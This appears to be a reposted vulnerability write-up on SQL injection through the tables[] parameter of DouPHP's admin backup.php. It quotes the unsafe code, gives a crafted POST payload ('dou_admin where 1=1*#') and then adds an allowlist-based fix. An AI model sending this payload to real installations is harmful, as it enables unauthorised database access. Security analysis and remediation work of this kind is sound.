The caller in backup.php loops over the requested tables:

```php
for ($i = $tableid; $i < $tablenumber && strlen($sqldump) < $vol_size * 1024; $i++) {
    // $tables[$i] is taken from the tables[] POST parameter and passed on as-is
    $sqldump .= $backup->sql_dumptable($tables[$i], $vol_size, $startfrom, strlen($sqldump));
    $startfrom = 0;
}
```
Following into the sql_dumptable function:
```php
function sql_dumptable($table, $vol_size, $startfrom = 0, $currsize = 0) {
    $offset = 100;
    if (!$startfrom) {
        // $table is interpolated into SQL without validation or escaping
        $tabledump = "DROP TABLE IF EXISTS `$table`;\n";
        // die("SHOW CREATE TABLE $table");
        $createtable = $GLOBALS['dou']->query("SHOW CREATE TABLE $table");
        $create = $GLOBALS['dou']->fetch_array($createtable);
        $tabledump .= $create[1] . ";\n\n";
        if ($GLOBALS['dou']->version() > '4.1' && $this->sqlcharset) {
            $tabledump = preg_replace("/(DEFAULT)*\s*CHARSET=[a-zA-Z0-9]+/", "DEFAULT CHARSET=" . $this->sqlcharset, $tabledump);
        }
    }
    $tabledumped = 0;
    $numrows = $offset;
    while ($currsize + strlen($tabledump) < $vol_size && $numrows == $offset) {
        $tabledumped = 1;
        //die("SELECT * FROM $table LIMIT $startfrom, $offset");
        // the same unvalidated $table reaches a second statement here
        $rows = $GLOBALS['dou']->query("SELECT * FROM $table LIMIT $startfrom, $offset");
        // ... the excerpt ends here; the rest of the loop body is not shown in the original
    }
}
```
Constructing the payload:
```
POST /admin/backup.php?rec=backup HTTP/1.1

tables%5B%5D=dou_admin where 1=1*#&startfrom=1&file_name=D20171110T165601&vol_size=2048&token=5c9a08d0&totalsize=119&submit=%E7%A1%AE%E5%AE%9A%E5%A4%87%E4%BB%BD
```
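As an added example (not DouPHP's own code), one way to close this hole is to treat `tables[]` as untrusted input: accept only names that match the MySQL identifier pattern and that actually exist according to `SHOW TABLES`, then backtick-quote them before building the statement. `$db` (a mysqli connection) and the handler layout are assumptions; a value like `dou_admin where 1=1*#` never reaches a query.

```php
<?php
// Added example: allowlist validation for the tables[] parameter of backup.php.
// $db is assumed to be an open mysqli connection (assumption, not from the page).

/**
 * Return only the requested names that are syntactically valid identifiers
 * AND exist in $existing (the list returned by SHOW TABLES).
 * Anything containing spaces, quotes, '#' or '*' is silently dropped.
 */
function filter_table_names(array $requested, array $existing): array
{
    $allowed = [];
    $existingSet = array_flip($existing);
    foreach ($requested as $name) {
        if (!is_string($name) || !preg_match('/^[A-Za-z0-9_]{1,64}$/', $name)) {
            continue; // rejects "dou_admin where 1=1*#" and similar input
        }
        if (!isset($existingSet[$name])) {
            continue; // well-formed, but not a table in this database
        }
        $allowed[] = $name;
    }
    return $allowed;
}

/** Backtick-quote an already validated identifier (doubling any inner backtick). */
function quote_identifier(string $name): string
{
    return '`' . str_replace('`', '``', $name) . '`';
}

// Usage inside the backup handler
$existing = [];
$res = $db->query('SHOW TABLES');
while ($row = $res->fetch_row()) {
    $existing[] = $row[0];
}
$tables = filter_table_names((array)($_POST['tables'] ?? []), $existing);
if (count($tables) === 0) {
    http_response_code(400);
    exit('no valid table selected');
}
$startfrom = (int)($_POST['startfrom'] ?? 0); // numeric parameters are cast, never interpolated raw
foreach ($tables as $table) {
    $t = quote_identifier($table);
    $db->query("SHOW CREATE TABLE $t");
    $db->query("SELECT * FROM $t LIMIT $startfrom, 100");
}
```

The existence check matters as much as the regex: the dump routine issues DROP TABLE and SELECT against whatever name it is given, so a syntactically clean but arbitrary name should still be refused.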
Original article: http://www.cnblogs.com/test404/p/7816087.html